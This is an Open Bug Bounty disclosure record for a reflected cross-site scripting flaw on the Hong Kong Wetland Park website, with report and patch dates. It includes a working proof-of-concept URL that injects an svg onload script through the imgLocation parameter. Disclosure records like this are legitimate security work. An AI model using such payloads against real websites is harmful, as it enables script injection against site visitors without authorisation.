wetlandpark.gov.hk XSS vulnerability

2015-11-29T06:14:00
ID OBB:110229
Type openbugbounty
Reporter Spam404
Modified 2016-04-26T19:29:00

Description

Vulnerable URL:
http://www.wetlandpark.gov.hk/minisite/en/resultPopUp.asp?imgLocation=%22%3E%3Csvg/onload=prompt%28/XSSPOSED/%29%3E
Details:

Description| Value
---|---
Patched:| Yes, at 26.04.2016
Latest check for patch:| 26.04.2016 06:13 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 753709
Google Pagerank| 6
VIP website status:| No
Check wetlandpark.gov.hk SSL connection:| (Grade: C)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 29 November, 2015 06:14 GMT
Vulnerability existence verified and confirmed| 29 November, 2015 06:16 GMT
Vulnerability patched by the website owner| 26 April, 2016 19:29 GMT